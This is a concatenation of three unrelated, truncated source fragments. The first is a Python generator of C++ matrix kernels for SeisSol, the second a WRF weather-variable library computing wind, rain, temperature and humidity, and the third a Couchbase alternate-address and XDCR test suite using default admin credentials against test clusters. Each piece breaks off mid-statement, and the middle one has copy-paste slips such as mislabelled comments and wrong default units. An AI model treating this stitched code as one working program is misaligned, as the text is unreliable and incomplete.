cpp.includeSys('Initializer/preProcessorMacros.fpp') cpp.include(self.prefix + 'gemms.h') with cpp.Namespace('seissol'): with cpp.Namespace('generatedKernels'): for name, gk in generatedKernels: with cpp.Function('void {}({})'.format(name, self.__gemmSignature(gk.involvedMatrices))): for temp in gk.temps: cpp(self.__localArray(temp.name, temp.requiredReals)) for operation in gk.operations: if operation['type'] == Kernel.Operation.MEMSET: cpp.memset(operation['pointer'], operation['numberOfReals'], operation['dataType'], operation['offset']) elif operation['type'] == Kernel.Operation.GEMM: prefetch = formatOffset(operation['gemm']['prefetchPointer'], operation['offsetC']) if operation['gemm'].has_key('prefetchPointer') else 'NULL' cpp('{}({}, {}, {}, NULL, {}, NULL);'.format( generateRoutineName(operation['gemm']), formatOffset(operation['nameA'], operation['offsetA']), formatOffset(operation['nameB'], operation['offsetB']), formatOffset(operation['nameC'], operation['offsetC']), prefetch )) with Code.Cpp('{}/{}flops.h'.format(outputDir, self.prefix)) as header: with header.HeaderGuard(self.prefix.upper() + 'FLOPS'): with header.Namespace('seissol'): with header.Namespace('flops'): for key, value in flops.iteritems(): if isinstance(value, dict): maxkey = max(value.keys()) nonZeroFlops = [str(value[i][0]) if value.has_key(i) else '0' for i in range(0, maxkey+1)] header('unsigned const {}_nonZero[] = {{ {} }};'.format(key, ', '.join(nonZeroFlops))) hardwareFlops = [str(value[i][1]) if value.has_key(i) else '0' for i in range(0, maxkey+1)] header('unsigned const {}_hardware[] = {{ {} }};'.format(key, ', '.join(hardwareFlops))) else: header('unsigned const {}_nonZero = {};'.format(key, value[0])) header('unsigned const {}_hardware = {};'.format(key, value[1])) def generateInitializer(self, outputDir): globalMatrixValues = dict() maxGlobalMatrixId = dict() for matrixInfo in self.db.itervalues(): if matrixInfo.isConstantGlobalMatrix: group = matrixInfo.globalMatrixGroup if not globalMatrixValues.has_key(group): globalMatrixValues[group] = dict() maxGlobalMatrixId[group] = -1 globalMatrixValues[group][matrixInfo.globalMatrixId] = matrixInfo.name maxGlobalMatrixId[group] = max(maxGlobalMatrixId[group], matrixInfo.globalMatrixId) globalMatrixOffsets = dict() for group in globalMatrixValues.keys(): globalMatrixOffsets[group] = [0] for i in range(0, maxGlobalMatrixId[group]+1): offset = self.db[globalMatrixValues[group][i]].requiredReals if globalMatrixValues[group].has_key(i) else 0 globalMatrixOffsets[group].append(globalMatrixOffsets[group][-1] + offset) with Code.Cpp('{}/{}sizes.h'.format(outputDir, self.prefix)) as header: with header.HeaderGuard(self.prefix.upper() + 'SIZES'): with header.Namespace('seissol'): with header.Namespace('model'): for matrixInfo in self.db.itervalues(): with header.Namespace(matrixInfo.name): header('unsigned const rows = {};'.format(matrixInfo.rows)) header('unsigned const cols = {};'.format(matrixInfo.cols)) header('unsigned const reals = {};'.format(matrixInfo.requiredReals)) if len(matrixInfo.blocks) == 1 and matrixInfo.blocks[0].ld > 0: header('unsigned const ld = {};'.format(matrixInfo.blocks[0].ld)) hFilename = self.prefix + 'init.h' with Code.Cpp(outputDir + '/' + hFilename) as header: with header.HeaderGuard(self.prefix.upper() + 'INIT'): header.includeSys('cstring') with header.Namespace('seissol'): with header.Namespace('model'): for matrixInfo in self.db.itervalues(): with header.Namespace(matrixInfo.name): if not matrixInfo.isConstantGlobalMatrix: header('void convertToDense({typename} const* matrix, {typename}* denseMatrix);'.format(typename=self.architecture.typename)) with header.Function('static inline int index(unsigned row, unsigned column)'): header('static int const lut[] = {{ {} }};'.format( ', '.join(map(str, matrixInfo.getIndexLUT())) )) header('return lut[row + column*{}];'.format(matrixInfo.rows)) with header.Function('static inline void setZero({}* data)'.format(self.architecture.typename)): header.memset('data', matrixInfo.requiredReals, self.architecture.typename) else: header('extern {} const values[];'.format(self.architecture.typename)) with header.Function('static inline void convertToDense({typename}* denseMatrix)'.format(typename=self.architecture.typename)): header('static {} const denseValues[] = {{ {} }};'.format( self.architecture.typename, ', '.join(matrixInfo.getValuesDense()) )) header('memcpy(denseMatrix, denseValues, {reals} * sizeof({typename}));'.format(reals=matrixInfo.rows*matrixInfo.cols, typename=self.architecture.typename)) for group in globalMatrixValues.keys(): prefix = group + '_' if len(group) > 0 else '' header('extern {} const*const {}globalMatrixValues[];'.format(self.architecture.typename, prefix)) header('extern unsigned const {}globalMatrixOffsets[];'.format(prefix)) header('unsigned const {}numGlobalMatrices = {};'.format(prefix, maxGlobalMatrixId[group]+1)) with Code.Cpp('{}/{}init.cpp'.format(outputDir, self.prefix)) as cpp: cpp.include(hFilename) with cpp.Namespace('seissol'): with cpp.Namespace('model'): for matrixInfo in self.db.itervalues(): if not matrixInfo.isConstantGlobalMatrix: with cpp.Function('void {namespace}::convertToDense({typename} const* matrix, {typename}* denseMatrix)'.format(namespace=matrixInfo.name, typename=self.architecture.typename)): cpp.memset('denseMatrix', matrixInfo.rows * matrixInfo.cols, self.architecture.typename) for block in matrixInfo.blocks: with cpp.For('unsigned col = {block.startcol}; col < {block.stopcol}; ++col'.format(block=block)): with cpp.For('unsigned row = {block.startrow} + {block.startpaddingrows}; row < {block.stoprow}; ++row'.format(block=block)): if block.sparse: cpp('int idx = index(row, col);') with cpp.If('idx != -1'): cpp('denseMatrix[col * {matrixInfo.rows} + row] = matrix[idx];'.format(matrixInfo=matrixInfo)) else: cpp('denseMatrix[col * {matrixInfo.rows} + row] = matrix[{block.offset} + (col - {block.startcol}) * {block.ld} + (row - {block.startrow})];'.format( matrixInfo=matrixInfo, block=block )) else: cpp('{} const {}::values[] = {{ {} }};'.format( self.architecture.typename, matrixInfo.name, ', '.join(matrixInfo.getValuesAsStoredInMemory()) )) for group in globalMatrixValues.keys(): prefix = group + '_' if len(group) > 0 else '' cpp('{} const*const {}globalMatrixValues[] = {{ {} }};'.format( self.architecture.typename, prefix, ', '.join(['&' + globalMatrixValues[group][i] + '::values[0]' if globalMatrixValues[group].has_key(i) else 'NULL' for i in
<gh_stars>0 """ Library Features: Name: lib_wrf_variables Author(s): <NAME> (<EMAIL>) Date: '20210522' Version: '1.1.0' """ ####################################################################################### # Library import logging import numpy as np import pandas as pd from src.hyde.algorithm.io.nwp.wrf.lib_wrf_io_generic import reshape_var3d, create_darray_3d from src.hyde.algorithm.settings.nwp.wrf.lib_wrf_args import logger_name # Logging log_stream = logging.getLogger(logger_name) # Debug # import matplotlib.pylab as plt ####################################################################################### # ------------------------------------------------------------------------------------- # Method to define variable attribute(s) def getVarAttributes(var_attrs_in): var_attrs_tmp = {} for var_attrs_step in var_attrs_in: for var_attr_key, var_attr_value in var_attrs_step.items(): if var_attr_key not in list(var_attrs_tmp.keys()): var_attrs_tmp[var_attr_key] = var_attr_value else: var_attr_tmp = var_attrs_tmp[var_attr_key] var_attr_list = [var_attr_tmp, var_attr_value] var_attr_list_filter = [] for var_attr_step in var_attr_list: if isinstance(var_attr_step, list): var_attr_step = var_attr_step[0] var_attr_list_filter.append(var_attr_step) var_attr_list = list(set(var_attr_list_filter)) var_attrs_tmp[var_attr_key] = var_attr_list var_attr_out = {} for var_attr_key, var_attr_value in var_attrs_tmp.items(): if isinstance(var_attr_value, list) and var_attr_value.__len__() == 1: var_attr_out[var_attr_key] = var_attr_value[0] else: var_attr_out[var_attr_key] = var_attr_value return var_attr_out # ------------------------------------------------------------------------------------- # ------------------------------------------------------------------------------------- # Method to compute WindSpeed def computeWindSpeed(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None, var_units=None, var_step_type=None): # Set args if var_step_type is None: var_step_type = ['instant'] if var_units is None: var_units = ['m s**-1'] if var_geo_y is None: var_geo_y = ['latitude'] if var_geo_x is None: var_geo_x = ['longitude'] if var_time is None: var_time = ['valid_time'] # Parse args var_name_1 = list(var_name)[0] var_name_2 = list(var_name)[1] var_name_3 = list(var_name)[2] var_units = var_units[0] var_step_type = var_step_type[0] var_time = var_time[0] var_geo_x = var_geo_x[0] var_geo_y = var_geo_y[0] # Get values var_da_in_1 = var_dset[var_name_1] var_values_in_1 = var_da_in_1.values var_dims_in_1 = var_da_in_1.dims var_da_in_2 = var_dset[var_name_2] var_values_in_2 = var_da_in_2.values var_dims_in_2 = var_da_in_2.dims var_time = var_dset[var_name_1][var_time] var_geo_x = var_dset[var_name_1][var_geo_x] var_geo_y = var_dset[var_name_1][var_geo_y] var_time_str_1 = var_dims_in_1[0].lower() if (var_time_str_1 == 'step') or (var_time_str_1 == 'time'): var_values_in_1 = reshape_var3d(var_values_in_1) var_shape_in_1 = var_values_in_1.shape var_time_str_2 = var_dims_in_2[0].lower() if (var_time_str_2 == 'step') or (var_time_str_2 == 'time'): var_values_in_2 = reshape_var3d(var_values_in_2) var_shape_in_2 = var_values_in_2.shape # Check attributes if not (var_units == 'm s-1') and not (var_units == 'm s**-1'): log_stream.error(' ===> Wind components units are not allowed! Check your data!') raise IOError('Data units is not allowed!') if not (var_step_type == 'instant') and not (var_step_type == 'instantaneous'): log_stream.error(' ===> Wind components allowed only in instantaneous format! Check your data!') raise IOError('Data type is not allowed!') if not var_shape_in_1 == var_shape_in_2: log_stream.error(' ===> Wind dimensions are not the same! Check your data!') raise IOError('Data dimensions are not allowed!') else: var_shape_in = list({var_shape_in_1, var_shape_in_2})[0] var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]]) var_values_out[:, :, :] = np.nan for var_step in range(0, var_shape_in[2]): var_values_step_1 = var_values_in_1[:, :, var_step] var_values_step_2 = var_values_in_2[:, :, var_step] var_values_out[:, :, var_step] = np.sqrt(var_values_step_1 ** 2 + var_values_step_2 ** 2) * 0.7 var_da_in_1 = create_darray_3d(var_values_in_1, var_time, var_geo_x, var_geo_y, dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude', dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time', dims_order=['latitude', 'longitude', 'time']) var_da_in_2 = create_darray_3d(var_values_in_2, var_time, var_geo_x, var_geo_y, dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude', dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time', dims_order=['latitude', 'longitude', 'time']) var_da_out = create_darray_3d(var_values_out, var_time, var_geo_x, var_geo_y, dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude', dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time', dims_order=['latitude', 'longitude', 'time']) var_dset_out = var_da_in_1.to_dataset(name=var_name_1) var_dset_out[var_name_2] = var_da_in_2 var_dset_out[var_name_3] = var_da_out return var_dset_out # ------------------------------------------------------------------------------------- # ------------------------------------------------------------------------------------- # Method to compute WindSpeed def computeRain(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None, var_units=None, var_step_type=None): # Set args if var_step_type is None: var_step_type = ['accum'] if var_units is None: var_units = ['m'] if var_geo_y is None: var_geo_y = ['latitude'] if var_geo_x is None: var_geo_x = ['longitude'] if var_time is None: var_time = ['valid_time'] # Parse args var_name = list(var_name)[0] var_units = var_units[0] var_step_type = var_step_type[0] var_time = var_time[0] var_geo_x = var_geo_x[0] var_geo_y = var_geo_y[0] # Get values var_da_in = var_dset[var_name] var_values_in = var_da_in.values var_dims_in = var_da_in.dims var_time = var_dset[var_time] var_geo_x = var_dset[var_geo_x] var_geo_y = var_dset[var_geo_y] if (var_units == 'kg m**-2') or (var_units == 'Kg m**-2'): var_units = 'mm' if var_units == 'm': var_scale_factor = 1000 elif var_units == 'mm': var_scale_factor = 1 else: log_stream.error(' ===> Rain components units are not allowed! Check your data!') raise IOError('Selected units are not allowed!') var_time_str = var_dims_in[0].lower() if (var_time_str == 'step') or (var_time_str == 'time'): var_values_in = reshape_var3d(var_values_in) var_shape_in = var_values_in.shape # Check attributes if not (var_units == 'mm') and not (var_units == 'm'): log_stream.error(' ===> Rain components units are not allowed! Check your data!') raise IOError('Data units is not allowed!') if not (var_step_type == 'accum') and not (var_step_type == 'accumulated'): log_stream.error(' ===> Rain components allowed only in accumulated format! Check your data!') raise IOError('Data type is not allowed!') var_values_step_start = None var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]]) var_values_out[:, :, :] = np.nan for var_step in range(0, var_shape_in[2]): var_values_step_tmp = var_values_in[:, :, var_step] if var_values_step_start is None: var_values_step_end = var_values_step_tmp var_values_step = var_values_step_end var_values_step_start = var_values_step_end else: var_values_step_end = var_values_step_tmp var_values_step = var_values_step_end - var_values_step_start var_values_step_start = var_values_step_end var_values_step[var_values_step < 0.0] = 0.0 var_values_out[:, :, var_step] = var_values_step / var_scale_factor var_da_out = create_darray_3d(var_values_out, var_time, var_geo_x, var_geo_y, dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude', dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time', dims_order=['latitude', 'longitude', 'time']) var_dset_out = var_da_out.to_dataset(name=var_name) return var_dset_out # ------------------------------------------------------------------------------------- # ------------------------------------------------------------------------------------- # Method to compute AirTemperature def computeAirTemperature(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None, var_units=None, var_step_type=None): # Set args if var_step_type is None: var_step_type = ['instant'] if var_units is None: var_units = ['K'] if var_geo_y is None: var_geo_y = ['latitude'] if var_geo_x is None: var_geo_x = ['longitude'] if var_time is None: var_time = ['valid_time'] # Parse args var_name = list(var_name)[0] var_units = var_units[0] var_step_type = var_step_type[0] var_time = var_time[0] var_geo_x = var_geo_x[0] var_geo_y = var_geo_y[0] # Get values var_da_in = var_dset[var_name] var_values_in = var_da_in.values var_dims_in = var_da_in.dims var_time = var_dset[var_time] var_geo_x = var_dset[var_geo_x] var_geo_y = var_dset[var_geo_y] var_time_str = var_dims_in[0].lower() if (var_time_str == 'step') or (var_time_str == 'time'): var_values_in = reshape_var3d(var_values_in) var_shape_in = var_values_in.shape # Check attributes if not (var_units == 'K'): log_stream.error(' ===> Air Temperature components units are not allowed! Check your data!') raise IOError('Data units is not allowed!') if not (var_step_type == 'instant') and not (var_step_type == 'instantaneous'): log_stream.error(' ===> Air Temperature components allowed only in instantaneous format! Check your data!') raise IOError('Data type is not allowed!') var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]]) var_values_out[:, :, :] = np.nan for var_step in range(0, var_shape_in[2]): var_values_step = var_values_in[:, :, var_step] var_values_out[:, :, var_step] = var_values_step - 273.15 var_da_out = create_darray_3d(var_values_out, var_time, var_geo_x, var_geo_y, dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude', dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time', dims_order=['latitude', 'longitude', 'time']) var_dset_out = var_da_out.to_dataset(name=var_name) return var_dset_out # ------------------------------------------------------------------------------------- # ------------------------------------------------------------------------------------- # Method to compute RelativeHumidity using Q, T and pressure def computeRH_from_Q(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None, var_units=None, var_step_type=None): # Set args if var_step_type is None: var_step_type = ['instant'] if var_units is None: var_units = ['m s**-1'] if var_geo_y is None: var_geo_y = ['latitude'] if var_geo_x is None: var_geo_x = ['longitude'] if var_time is None: var_time = ['valid_time'] # Parse args var_name_1 = list(var_name)[0] var_name_2 = list(var_name)[1] var_name_3 = list(var_name)[2] var_name_4 = list(var_name)[3] var_units_1 = var_units[0] var_units_2 = var_units[1] var_units_3 = var_units[2] var_units_4 = var_units[3] var_step_type = var_step_type[0] var_time = var_time[0] var_geo_x = var_geo_x[0] var_geo_y = var_geo_y[0] # Get values var_da_in_1 = var_dset[var_name_1] var_values_in_1 = var_da_in_1.values var_dims_in_1 = var_da_in_1.dims var_da_in_2 = var_dset[var_name_2] var_values_in_2 = var_da_in_2.values var_dims_in_2 = var_da_in_2.dims var_da_in_3 = var_dset[var_name_3] var_values_in_3 = var_da_in_3.values var_dims_in_3 = var_da_in_3.dims var_time = var_dset[var_name_1][var_time] var_geo_x = var_dset[var_name_1][var_geo_x] var_geo_y = var_dset[var_name_1][var_geo_y] var_time_str_1 = var_dims_in_1[0].lower() if (var_time_str_1 == 'step') or (var_time_str_1 == 'time'): var_values_in_1 = reshape_var3d(var_values_in_1) var_shape_in_1 = var_values_in_1.shape var_time_str_2 = var_dims_in_2[0].lower() if (var_time_str_2 == 'step') or (var_time_str_2 == 'time'): var_values_in_2 = reshape_var3d(var_values_in_2) var_shape_in_2 = var_values_in_2.shape var_time_str_3 = var_dims_in_3[0].lower() if (var_time_str_3 == 'step') or (var_time_str_3 == 'time'): var_values_in_3 = reshape_var3d(var_values_in_3) var_shape_in_3 = var_values_in_3.shape # Check attributes if not (var_units_1 == 'kg kg-1') and not (var_units_1 == 'kg/kg'): log_stream.error(' ===> RelativeHumidity components units are not allowed! Check your data! [MixingRatio]') raise IOError('Data units is not allowed!') if not var_units_2 == 'K': log_stream.error(' ===> RelativeHumidity components units are not allowed! Check your data! [AirTemperature]') raise IOError('Data units is not allowed!') if not (var_units_3 == 'Pa') and not (var_units_3 == 'PA'): log_stream.error(' ===> RelativeHumidity components units are not allowed! Check your data! [AirPressure]') raise IOError('Data units is not allowed!') if not (var_step_type == 'instant') and not (var_step_type == 'instantaneous'): log_stream.error(' ===> RelativeHumidity components allowed only in instantaneous format! Check your data!') raise IOError('Data type is not allowed!') if not (var_shape_in_1 == var_shape_in_2) or not (var_shape_in_2 == var_shape_in_3): log_stream.error(' ===> RelativeHumidity dimensions are not the same! Check your data!') raise IOError('Data dimensions are not allowed!') else: var_shape_in = list({var_shape_in_1, var_shape_in_2, var_shape_in_3})[0] var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]]) var_values_out[:, :, :] = np.nan for var_step
import copy import json, ast, filecmp, itertools import os, shutil, ast from threading import Thread from subprocess import Popen, PIPE, check_output, STDOUT, CalledProcessError from TestInput import TestInputSingleton, TestInputServer from alternate_address.alternate_address_base import AltAddrBaseTest from membase.api.rest_client import RestConnection, RestHelper from couchbase_helper.cluster import Cluster from remote.remote_util import RemoteMachineShellConnection from membase.helper.bucket_helper import BucketOperationHelper from membase.helper.cluster_helper import ClusterOperationHelper from couchbase_helper.documentgenerator import BlobGenerator, JsonDocGenerator from pprint import pprint from testconstants import CLI_COMMANDS, LINUX_COUCHBASE_BIN_PATH,\ WIN_COUCHBASE_BIN_PATH, COUCHBASE_FROM_MAD_HATTER,\ WIN_TMP_PATH_RAW class AlternateAddressTests(AltAddrBaseTest): def setUp(self): for server in TestInputSingleton.input.servers: remote = RemoteMachineShellConnection(server) remote.enable_diag_eval_on_non_local_hosts() remote.disconnect() super(AlternateAddressTests, self).setUp() self.remove_all_alternate_address_settings() self.cluster_helper = Cluster() self.ex_path = self.tmp_path + "export{0}/".format(self.master.ip) self.num_items = self.input.param("items", 1000) self.client_os = self.input.param("client_os", "linux") self.localhost = self.input.param("localhost", False) self.json_create_gen = JsonDocGenerator("altaddr", op_type="create", encoding="utf-8", start=0, end=self.num_items) self.json_delete_gen = JsonDocGenerator("imex", op_type="delete", encoding="utf-8", start=0, end=self.num_items) def tearDown(self): try: super(AlternateAddressTests, self).tearDown() except Exception as e: print e BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self) ClusterOperationHelper.cleanup_cluster(self.servers, self.servers[0]) def test_setting_alternate_address(self): server1 = self.servers[0] url_format = "" secure_port = "" secure_conn = "" self.skip_set_alt_addr = False shell = RemoteMachineShellConnection(server1) if self.secure_conn: cacert = self.get_cluster_certificate_info(server1) secure_port = "1" url_format = "s" if not self.no_cacert: secure_conn = "--cacert {0}".format(cacert) if self.no_ssl_verify: secure_conn = "--no-ssl-verify" output = self.list_alt_address(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) if output: output, _ = self.remove_alt_address_setting(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) mesg = 'SUCCESS: Alternate address configuration deleted' if not self._check_output(mesg, output): self.fail("Fail to remove alternate address") output = self.list_alt_address(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) if output and output[0] != "[]": self.fail("Fail to remove alternate address with remove command") self.log.info("Start to set alternate address") internal_IP = self.get_internal_IP(server1) setting_cmd = "{0}couchbase-cli{1} {2}"\ .format(self.cli_command_path, self.cmd_ext, "setting-alternate-address") setting_cmd += " -c http{0}://{1}:{2}{3} --username {4} --password {5} {6}"\ .format(url_format, internal_IP , secure_port, server1.port, server1.rest_username, server1.rest_password, secure_conn) setting_cmd = setting_cmd + "--set --hostname {0} ".format(server1.ip) shell.execute_command(setting_cmd) output = self.list_alt_address(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) if output and output[0]: output = output[0] output = output[1:-1] output = ast.literal_eval(output) if output["hostname"] != server1.ip: self.fail("Fail to set correct hostname") else: self.fail("Fail to set alternate address") self.log.info("Start to add node to cluster use internal IP") services_in = self.alt_addr_services_in if "-" in services_in: set_services = services_in.split("-") else: set_services = services_in.split(",") i = 0 num_hostname_add = 1 for server in self.servers[1:]: add_node_IP = self.get_internal_IP(server) node_services = "kv" if len(set_services) == 1: node_services = set_services[0] elif len(set_services) > 1: if len(set_services) == len(self.servers[1:]): node_services = set_services[i] i += 1 if self.add_hostname_node and num_hostname_add <= self.num_hostname_add: add_node_IP = server.ip num_hostname_add += 1 try: shell.alt_addr_add_node(main_server=server1, internal_IP=add_node_IP, server_add=server, services=node_services, cmd_ext=self.cmd_ext) except Exception as e: if e: self.fail("Error: {0}".format(e)) rest = RestConnection(self.master) rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[]) rest.monitorRebalance() self.log.info("Create default bucket") self._create_default_bucket(self.master) buckets = rest.get_buckets() status = RestHelper(rest).vbucket_map_ready(buckets[0].name) if not status: self.fail("Failed to create bucket.") if self.run_alt_addr_loader: if self.alt_addr_kv_loader: self.kv_loader(server1, client_os = self.client_os) if self.alt_addr_n1ql_query: self.n1ql_query(server1.ip, self.client_os, create_travel_sample_bucket=True) if self.alt_addr_eventing_function: self.create_eventing_function(server1, self.client_os, create_travel_sample_bucket=True) self.skip_set_alt_addr = True alt_addr_status = [] if not self.skip_set_alt_addr: for server in self.servers[1:]: internal_IP = self.get_internal_IP(server) status = self.set_alternate_address(server, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = internal_IP) alt_addr_status.append(status) if False in alt_addr_status: self.fail("Fail to set alt address") else: self.all_alt_addr_set = True if self.run_alt_addr_loader: if self.alt_addr_kv_loader: self.kv_loader(server1, self.client_os) if self.alt_addr_n1ql_query: self.n1ql_query(server1.ip, self.client_os) remove_node = "" if self.alt_addr_rebalance_out: internal_IP = self.get_internal_IP(self.servers[-1]) reject_node = "ns_1@{0}".format(internal_IP) self.log.info("Rebalance out a node {0}".format(internal_IP)) rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\ ejectedNodes=[reject_node]) reb_status = rest.monitorRebalance() self.assertTrue(reb_status, "Rebalance out node {0} failed".format(internal_IP)) remove_node = internal_IP if self.alt_addr_rebalance_in and self.alt_addr_rebalance_out: if remove_node: free_node = remove_node if self.add_hostname_node: free_node = self.get_external_IP(remove_node) cmd = 'curl -X POST -d "hostname={0}&user={1}&password={2}&services={3}" '\ .format(free_node, server1.rest_username, server1.rest_password, self.alt_addr_rebalance_in_services) cmd += '-u Administrator:password http://{0}:8091/controller/addNode'\ .format(server1.ip) shell.execute_command(cmd) rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\ ejectedNodes=[]) reb_status = rest.monitorRebalance() self.assertTrue(reb_status, "Rebalance back in failed") status = self.set_alternate_address(self.servers[-1], url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = free_node) if status: self.all_alt_addr_set = True else: self.all_alt_addr_set = False else: self.fail("We need a free node to add to cluster") if self.run_alt_addr_loader: if self.alt_addr_kv_loader: self.kv_loader(server1, self.client_os) if self.alt_addr_n1ql_query: self.n1ql_query(server1.ip, self.client_os) status = self.remove_all_alternate_address_settings() if not status: self.fail("Failed to remove all alternate address setting") def test_alt_addr_with_xdcr(self): url_format = "" secure_port = "" secure_conn = "" self.setup_xdcr_cluster() des_alt_addr_set = False self.log.info("Create bucket at source") src_master = self.clusters_dic[0][0] self._create_buckets(src_master) src_rest = RestConnection(src_master) src_buckets = src_rest.get_buckets() if src_buckets and src_buckets[0]: src_bucket_name = src_buckets[0].name else: self.fail("Failed to create bucket at src cluster") des_master = self.clusters_dic[1][0] self.log.info("Create bucket at destination") self._create_buckets(des_master) des_rest = RestConnection(des_master) des_buckets = des_rest.get_buckets() if des_buckets and des_buckets[0]: des_bucket_name = des_buckets[0].name else: self.fail("Failed to create bucket at des cluster") for server in self.clusters_dic[0]: internal_IP = self.get_internal_IP(server) status = self.set_alternate_address(server, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = internal_IP) self.all_alt_addr_set = True self.kv_loader(src_master, "mac") self.create_xdcr_reference(src_master.ip, des_master.ip) src_num_docs = int(src_rest.get_active_key_count(src_bucket_name)) count = 0 src_num_docs = int(src_rest.get_active_key_count(src_bucket_name)) while count < 10: if src_num_docs < 10000: self.sleep(10, "wait for items written to bucket") src_num_docs = int(src_rest.get_active_key_count(src_bucket_name)) count += 1 if src_num_docs == 10000: self.log.info("all bucket items set") break if count == 2: self.fail("bucket items does not set after 30 seconds") self.create_xdcr_replication(src_master.ip, des_master.ip, src_bucket_name) self.sleep(25, "time needed for replication to be created") self.log.info("Reduce check point time to 30 seconds") self.set_xdcr_checkpoint(src_master.ip, 30) #self.set_xdcr_checkpoint(des_master.ip, 30) self.log.info("Get xdcr configs from cluster") shell = RemoteMachineShellConnection(self.master) rep_id_cmd = "curl -u Administrator:password http://{0}:8091/pools/default/remoteClusters"\ .format(self.master.ip) output, error = shell.execute_command(rep_id_cmd) output = output[0][1:-1] xdcr_config = json.loads(output) cmd = "curl -u Administrator:password http://localhost:8091/sasl_logs/goxdcr " cmd += "| grep 'Execution timed out' | tail -n 1 " output, error = shell.execute_command(cmd) self.log.info("Verify replication timeout due to alt addr does not enable at des cluster") if xdcr_config["uuid"] in output[0] and "Execution timed out" in output[0]: self.log.info("replication failed as expected as alt addr does not enable at des") else: self.fail("Alt addr failed to disable at des cluster") count = 0 des_num_docs = int(des_rest.get_active_key_count(des_bucket_name)) while count < 6: if src_num_docs != des_num_docs: self.sleep(60, "wait for replication ...") des_num_docs = int(des_rest.get_active_key_count(des_bucket_name)) count += 1 elif src_num_docs == des_num_docs: self.fail("Replication should fail. Alt addr at des does not block") break if count == 6: if not des_alt_addr_set: self.log.info("This is expected since alt addr is not set yet") des_alt_addr_status =[] for server in self.clusters_dic[1]: internal_IP = self.get_internal_IP(server) des_alt_addr_status.append(self.set_alternate_address(server, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = internal_IP)) if False in des_alt_addr_status: self.fail("Failed to set alt addr at des cluster") else: des_alt_addr_set = True count = 0 self.log.info("Restart replication") cmd = "curl -X POST -u Administrator:password " cmd += "http://{0}:8091/settings/replications/{1}%2F{2}%2F{2} "\ .format(self.master.ip, xdcr_config["uuid"], des_bucket_name) cmd += "-d pauseRequested=" try: check_output(cmd + "true", shell=True, stderr=STDOUT) self.sleep(20) check_output(cmd + "false", shell=True, stderr=STDOUT) except CalledProcessError as e: print("Error return code: {0}".format(e.returncode)) if e.output: self.fail(e.output) des_rest = RestConnection(des_master) self.log.info("Verify docs is replicated to des cluster") while count < 6: if src_num_docs != des_num_docs: self.sleep(60, "wait for replication start...") des_num_docs = int(des_rest.get_active_key_count(des_bucket_name)) count += 1 elif src_num_docs == des_num_docs: self.log.info("Replication is complete") break if count == 6: if des_alt_addr_set: self.fail("Replication does not complete after 6 minutes") self.delete_xdcr_replication(src_master.ip, xdcr_config["uuid"]) def remove_all_alternate_address_settings(self): self.log.info("Remove alternate address setting in each node") remove_alt = [] for server in self.servers: shell = RemoteMachineShellConnection(server) cmd = "{0}couchbase-cli{1} {2} -c {3}:{4} --username {5} --password {6} {7}"\ .format(self.cli_command_path, self.cmd_ext, "setting-alternate-address", server.ip, server.port, server.rest_username, server.rest_password, "--remove") output, error = shell.execute_command(cmd, debug=True) if error: remove_alt.append(error) shell.disconnect() if remove_alt: self.log.error("Remove alt address failed: {0}".format(remove_alt)) return False else: return True def remove_alt_address_setting(self, server=None, url_format = "", secure_port = "", secure_conn = ""): sub_command = "setting-alternate-address" if server is None: server = self.master cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\ .format(self.cli_command_path, self.cmd_ext, sub_command, url_format, server.ip, secure_port, server.port, server.rest_username, server.rest_password, secure_conn) remove_cmd = cmd + " --remove" shell = RemoteMachineShellConnection(server) output, error = shell.execute_command(remove_cmd) shell.disconnect() return output, error def list_alt_address(self, server=None, url_format = "", secure_port = "", secure_conn = ""): sub_command = "setting-alternate-address" if server is None: server = self.master cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\ .format(self.cli_command_path, self.cmd_ext, sub_command, url_format, server.ip, secure_port, server.port, server.rest_username, server.rest_password, secure_conn) list_cmd = cmd + " --list" shell = RemoteMachineShellConnection(server) output, error = shell.execute_command(list_cmd) shell.disconnect() return output def set_alternate_address(self,
